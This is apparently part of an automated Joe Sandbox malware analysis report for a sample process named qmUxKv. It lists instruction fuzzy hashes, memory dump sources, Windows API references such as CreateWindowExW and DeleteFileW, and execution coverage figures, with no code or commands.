                                                • Opcode ID: e7a6d85242b8aa612b20703049ebd9660efad09c41fc8c4e47052d914ac1b5ac
                                                • Instruction ID: 0172d7a261c82dcb81f1cc0bf4f31754bfd0d7d326c4c76bc71ba903bba27e93
                                                • Opcode Fuzzy Hash: e7a6d85242b8aa612b20703049ebd9660efad09c41fc8c4e47052d914ac1b5ac
                                                • Instruction Fuzzy Hash: 4B319A72900249AFCB50DFAAD944ADEBFF9EF49320F10802EE418E7251D731A950CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c110240c777677c2c4a326f8c5feda01c345d9c01ae86e88567640b74dd7e916
                                                • Instruction ID: 5ee333a7ed29cce123300de82981bfe5d305dbdba36b25319949593c55239f08
                                                • Opcode Fuzzy Hash: c110240c777677c2c4a326f8c5feda01c345d9c01ae86e88567640b74dd7e916
                                                • Instruction Fuzzy Hash: B331D372C097D48FD702DFACD9506CABFF4EF56220F05409BC094AB262D2749948CBA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 65d408f9a1f091d7f9ca788504da8642e78d3beae964716542873ee0eb1dee5a
                                                • Instruction ID: a792ab4f3e699cb97cd69155482dc0b2269ccd3f64f6a89927426b67fe1a65fb
                                                • Opcode Fuzzy Hash: 65d408f9a1f091d7f9ca788504da8642e78d3beae964716542873ee0eb1dee5a
                                                • Instruction Fuzzy Hash: AC31F8B3E18152DFD7404B54D604779F7A2FF423A5F18C1AFD4558B286C7368481EB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727391000.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_11bd000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00c8b6b9e4311c75dd9398221b2a7396ff0f3339e3cd084e28c4b4a6aff8ccea
                                                • Instruction ID: 674244a36817527d16aca4ed2adbf0c7ace6aa4f6ef7fb18177f47eeb80770c8
                                                • Opcode Fuzzy Hash: 00c8b6b9e4311c75dd9398221b2a7396ff0f3339e3cd084e28c4b4a6aff8ccea
                                                • Instruction Fuzzy Hash: 77210371500240DFDF0EDF58EAC0B66BF75FB9831CF248569E9094A256C336D456CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727486949.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_11cd000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 057799d8bb150d81ee00a3f6e0f680b1785f92dafd568c9f9b0b28d0da7b1eb7
                                                • Instruction ID: ec86b0c7982654c6f88a8c34aa7047305d4ecad211db092622275a19604e6308
                                                • Opcode Fuzzy Hash: 057799d8bb150d81ee00a3f6e0f680b1785f92dafd568c9f9b0b28d0da7b1eb7
                                                • Instruction Fuzzy Hash: 67210471504300DFDF09DF98E9C4B26BBA6FB94B24F20C57DE8494B256C336D446CAA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727486949.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_11cd000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aa57646917718c7790555210126221599f8f2723988ecc72a1981f0e9b4988bb
                                                • Instruction ID: bc54d815dc35f2559294aa7ee1fd79bff16144ab70ec205f8208431482977e40
                                                • Opcode Fuzzy Hash: aa57646917718c7790555210126221599f8f2723988ecc72a1981f0e9b4988bb
                                                • Instruction Fuzzy Hash: 082137B1604200DFCF09DF98E9C4B16FBA5FB94B14F20C57DD9094B656C336D446CAA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 32d8739a498d294a3512c8f81c0dc73b3daee953111933d06ad0cd9c8717e092
                                                • Instruction ID: 5cfc7f974cabd442730b9ac2d0843c5e3ddc5cd499b27cb3a34d695cbc39b949
                                                • Opcode Fuzzy Hash: 32d8739a498d294a3512c8f81c0dc73b3daee953111933d06ad0cd9c8717e092
                                                • Instruction Fuzzy Hash: 6821F035E083864FC766DB798D414BFBFB6EEC616031845AED4A5CB292EB308905C361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 540367b57acc7a4f0f30a0f46a33ce0aba82c947e75bf8e80f88998aa1d549ae
                                                • Instruction ID: e67bc5d87a9604ef6e191f9d94bf0645d98b9c6d528dde5556559f5083fd6383
                                                • Opcode Fuzzy Hash: 540367b57acc7a4f0f30a0f46a33ce0aba82c947e75bf8e80f88998aa1d549ae
                                                • Instruction Fuzzy Hash: DB118E35A0E384AFCB47CF748D2A4AE7FF99F4621071444EBE444CB292EA319E05C762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4564ce374c61e22505cfc4096311aa8d4e34e298a35a3179b84512edf2d4b557
                                                • Instruction ID: e77ee54e909257c5138beabc3a855e3f7e3a76c664c6c2caac76d86971e9bd02
                                                • Opcode Fuzzy Hash: 4564ce374c61e22505cfc4096311aa8d4e34e298a35a3179b84512edf2d4b557
                                                • Instruction Fuzzy Hash: 473114B4D01258DFDB60DF99C685BCEBFF0AB08314F20845AE408BB254C7759945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 388ae4408aa2dbb77d2e005fe214e1baa4a05ef95e5431c577667111d38cd89a
                                                • Instruction ID: c24627c466ad589f82bebd05b4fa94fe311d4b37031f0d2e1607334432478a7f
                                                • Opcode Fuzzy Hash: 388ae4408aa2dbb77d2e005fe214e1baa4a05ef95e5431c577667111d38cd89a
                                                • Instruction Fuzzy Hash: 0831F3B4C01219DFDB60DF99CA89B8EBFF4EB08324F24845AE404BB254C7B59985CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 591ddb5e0bf6b913cd32ab8a31e8481c97a709a7bdd2f6a6bee0c218fb1676e3
                                                • Instruction ID: 97ff1c83002f67bf3308b2143b35b5115151afba18c1cf4ccaee27327da45e75
                                                • Opcode Fuzzy Hash: 591ddb5e0bf6b913cd32ab8a31e8481c97a709a7bdd2f6a6bee0c218fb1676e3
                                                • Instruction Fuzzy Hash: 63219FB4A00908DFC744CF5AE084999BBF1FF8D310F5280D5D5889B36AEB31E9A5CB05
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d521764cbeba224a910c12d4e0b236bd1a433fd13dad3c6dce88d87cf36c9af6
                                                • Instruction ID: 8933aabe4c63475747d86059088401d70de50fe8c241c91d5894af1f6d1537b0
                                                • Opcode Fuzzy Hash: d521764cbeba224a910c12d4e0b236bd1a433fd13dad3c6dce88d87cf36c9af6
                                                • Instruction Fuzzy Hash: 41119E79E1070A9B8B94EE798D855BFB6FAFFC4260710892DD529D7380EB309D0587A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727391000.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_11bd000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction ID: 4311d8567c87f85597cd70acb73e04c29be7a0c149a71ff1f03a6b1277b81e3e
                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction Fuzzy Hash: F811E172404280CFCF0ACF44D5C4B56BF71FB94318F24C6A9D8090B256C336D45ACBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b7fbf3880aa4305a157490cdab560450d0eb6de99e6c7574591ac2e0ca04d9d4
                                                • Instruction ID: 20371bcbbe964a570ee7f002f97b8fa2500b9606d2b72af7719f88dfd5180677
                                                • Opcode Fuzzy Hash: b7fbf3880aa4305a157490cdab560450d0eb6de99e6c7574591ac2e0ca04d9d4
                                                • Instruction Fuzzy Hash: 3321D3B6D003499FCB50DF9AD984ADEBFF4FB48320F10841AE919A7211C375A954CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727486949.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_11cd000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 07a4f271d86f4706351eb6678835bab0c1dc50e15a4ea21875ed46500451dd5f
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: AC11DD76504280CFDB06CF54D9C4B15BFA2FB84728F24C6AED8494B256C33AD40ACBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727486949.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_11cd000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 422999c0497d256d9e362c6e34c9f7d9b13838d2c986d5aa0654dd53dbb6083c
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 7E11BE75504240CFDB06CF54E5C4B55FF61FB84618F24C6ADD9094B656C33AE44ACB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84d9692ff312df77e011e5d8d3c74148950815d49ad7e145dc2e6daa96371078
                                                • Instruction ID: a5f12aec9b7ed9caab89f590ed99ef0e63ad8799f27b6e58edce3e8331f08f80
                                                • Opcode Fuzzy Hash: 84d9692ff312df77e011e5d8d3c74148950815d49ad7e145dc2e6daa96371078
                                                • Instruction Fuzzy Hash: 8401E274E00248AFDB44DFA9C588A99BFF2AF48210F19C0D9E4599B362D7309A44CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 78ba97a3116deaea3b3e9c40661219e87be717efd00dc558ecf7d7d43ef0643b
                                                • Instruction ID: 22f00760f351d1d7c920576057d3d153c70af966d984c1850e811712c20fedbf
                                                • Opcode Fuzzy Hash: 78ba97a3116deaea3b3e9c40661219e87be717efd00dc558ecf7d7d43ef0643b
                                                • Instruction Fuzzy Hash: 2FF0E9326042497FCF4ADF69DD41DDE7FBDDF45220B0481AFE408DB251E63199008760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc54594375e78ae4c6751f0df6cc278d2192c7a66061443381f07cc643823bac
                                                • Instruction ID: 3231e5727ee7d622d5009e5902314e427f3eb10d59e85a34fca386d7086b9944
                                                • Opcode Fuzzy Hash: bc54594375e78ae4c6751f0df6cc278d2192c7a66061443381f07cc643823bac
                                                • Instruction Fuzzy Hash: CB015478E00208AFDB44DFA9D598A9DBBF2AF48210F15C099E9199B365D771D950CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: T+-q$[V~*$[V~*$]\`
                                                • API String ID: 0-1849991408
                                                • Opcode ID: 9a634109c996ba397884741fe8c9dd204f1ab86cbd3589a6b975cac5a83a6cdc
                                                • Instruction ID: a8ce49b91a2169e7fcd97c3befde786e1d56db0bc1f4dce63aba19ac1981f57f
                                                • Opcode Fuzzy Hash: 9a634109c996ba397884741fe8c9dd204f1ab86cbd3589a6b975cac5a83a6cdc
                                                • Instruction Fuzzy Hash: 89B10671E1561ADFDB44CFAAEA8089EFBF2BF89310B14E52AD415BB214D7309901CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q$LR^q$$^q$$^q
                                                • API String ID: 0-2454687669
                                                • Opcode ID: ef3c88aeac335c8f627a0e1d7ee8fb816e5bf6ac2caf24ee51a2187712a07875
                                                • Instruction ID: f13cb494dd74a1609073a28582a40f4706d53c8c4fe036473651248fe0261dc8
                                                • Opcode Fuzzy Hash: ef3c88aeac335c8f627a0e1d7ee8fb816e5bf6ac2caf24ee51a2187712a07875
                                                • Instruction Fuzzy Hash: 3E919B75E0011ACFCB54CFA8C680AADBBF2BF49325F15855AE452EB656C334EC90DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:181
                                                Total number of Limit Nodes:18
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 536cee5bb6ccff38483e0741755317d6ddd7cb4ad1b574573328ddd6ef371f15
                                                • Instruction ID: b84eba88b5e0bbc4d6ffd01a60e52b582cfa87db9cbd554cf3aaf99247ec2f35
                                                • Opcode Fuzzy Hash: 536cee5bb6ccff38483e0741755317d6ddd7cb4ad1b574573328ddd6ef371f15
                                                • Instruction Fuzzy Hash: 30813570A00B048FD765CF2AD54475ABBF2FF88200F108A2EE49ACBB50D735E945CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0641D1C2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: b74282260572838dcffdf77f8c1f22c0b1d4f461eb6ac5fe9d49c94a45ab8f03
                                                • Instruction ID: a538c20014b8a3cc1fdf5c30b31f3ef9eaaa3affdd78f1f265cd52e6aee9c13a
                                                • Opcode Fuzzy Hash: b74282260572838dcffdf77f8c1f22c0b1d4f461eb6ac5fe9d49c94a45ab8f03
                                                • Instruction Fuzzy Hash: E351DFB1C00349AFDF15CFA9C984ADEBFB5BF49314F24816AE818AB220D7719855CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2976325097.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6420000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 940e437dd5cdd8adad5f39b363dae77383f6b9867432713f88cda76268685fdb
                                                • Instruction ID: 30a3129ccfb1b9019baeda1ac244def34d85cd3b640ca27f5e2703b11bf95bc2
                                                • Opcode Fuzzy Hash: 940e437dd5cdd8adad5f39b363dae77383f6b9867432713f88cda76268685fdb
                                                • Instruction Fuzzy Hash: CF414672D043A68FCB14DFB9C8442AEBFF5AF89210F1585ABD414A7391EB34A841CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0641D1C2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 96f934fe2561241b0b46a1c600778eeb54d925ef73f97aee66a82b950f718a94
                                                • Instruction ID: b08487705cfb2c70da67592ec5ceaadf5bc937466dc9cc6775724a6b5fa04f11
                                                • Opcode Fuzzy Hash: 96f934fe2561241b0b46a1c600778eeb54d925ef73f97aee66a82b950f718a94
                                                • Instruction Fuzzy Hash: 6851C2B1D00349DFDB14CF99C984ADEBFB5BF49314F24852AE419AB210D7719845CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0641D1C2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 728b3ee4ebb57b974971c6a135e0cfc1c2cbb681aa13fd1578ccbf0893ec4233
                                                • Instruction ID: ddaf85004c5c89dd1039a6c409dda9199af702c3b3b8806a40b018ad50c07e6e
                                                • Opcode Fuzzy Hash: 728b3ee4ebb57b974971c6a135e0cfc1c2cbb681aa13fd1578ccbf0893ec4233
                                                • Instruction Fuzzy Hash: 7841B0B1D10309DFDB14CF99C984ADEBFB5BF48310F24852AE819AB210D7759885CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0641F8B1
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: b9ba61c592cafe3fd97827f98eba030b8394e14558063cbade4b8614dc800a86
                                                • Instruction ID: bc0e2d3bf14c92bff0db3ee06ab286da97a6f78cb4358290ecde77e52733511c
                                                • Opcode Fuzzy Hash: b9ba61c592cafe3fd97827f98eba030b8394e14558063cbade4b8614dc800a86
                                                • Instruction Fuzzy Hash: D5412AB5A00305DFDB54CF5AC848AAABBF5FB88314F24C559D519AB321D734A846CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06412C7F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 9f7d8ff6862a44aae22c89ee5e48489a91957d4d754daec5ebaea2084ef99088
                                                • Instruction ID: 8d07b4941ddc7cdb5429201505d962f8dcf657cdeb4908ef925a486a4853ebc1
                                                • Opcode Fuzzy Hash: 9f7d8ff6862a44aae22c89ee5e48489a91957d4d754daec5ebaea2084ef99088
                                                • Instruction Fuzzy Hash: 4021E3B5D002589FDB10CFAAD984ADEBBF8EB48310F14801AE958A7320D374A950CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06412C7F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 4e9d3595de791622ac480c821d6e323916aa3fe54d7b7e1433e50788bfae2562
                                                • Instruction ID: 2f0f3c95e32aa8596408db1906b8ab06268daff90869540b58f8d3b72ff40490
                                                • Opcode Fuzzy Hash: 4e9d3595de791622ac480c821d6e323916aa3fe54d7b7e1433e50788bfae2562
                                                • Instruction Fuzzy Hash: 1821E2B5D003189FDB10CFAAD984ADEBBF8EB48320F14801AE918A7310D374A940CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DeleteFileW.KERNELBASE(00000000), ref: 02EA73C0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2932017052.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_2ea0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 86b7c0e6def2975e23fb795343e46f85bc6acee61e2fc1504d07b9631477feb0
                                                • Instruction ID: e175d0112ae54c6a3e34337eac9122309a93f89dbfa4b13b164041b2dba26b28
                                                • Opcode Fuzzy Hash: 86b7c0e6def2975e23fb795343e46f85bc6acee61e2fc1504d07b9631477feb0
                                                • Instruction Fuzzy Hash: 832147B1C0065A8BCB10CFAAC545BEEFBB0BF48324F15816AD858B7650D338A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DeleteFileW.KERNELBASE(00000000), ref: 02EA73C0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2932017052.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_2ea0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 40e2c7755906bdaa0a5dca33b4a39d1e7b2395a28214e8f408e131f889505b15
                                                • Instruction ID: e80c00bdc862635911165fad1634f18507c0898eb8df3194bc37941af07bba9f
                                                • Opcode Fuzzy Hash: 40e2c7755906bdaa0a5dca33b4a39d1e7b2395a28214e8f408e131f889505b15
                                                • Instruction Fuzzy Hash: 761133B1C0061A9BCB10CF9AC545B9EFBB4BF48324F11812AD858A7250D338A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0641B38A
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 5921244d0428f8d5c3cc4935a794f690d2fe0ffe42a99b5009c9314ff162a3a9
                                                • Instruction ID: f5c7725002925624b2dadc2fa9802978d7bf9251acdca55cd0e5f00e67c278db
                                                • Opcode Fuzzy Hash: 5921244d0428f8d5c3cc4935a794f690d2fe0ffe42a99b5009c9314ff162a3a9
                                                • Instruction Fuzzy Hash: B011F6B6D003199FDB14CFAAD844ADEFFF4EB49310F10842AE459AB610C375A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0642E68A), ref: 0642E777
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2976325097.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6420000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 415e2d2e8dba87a2d2e6439afb47c22683664601facba2fed1b853c970ae83d2
                                                • Instruction ID: b0a53195e59ec4cd7382851970104a10ae5fd01e92f856fb8e51e4c0266d212c
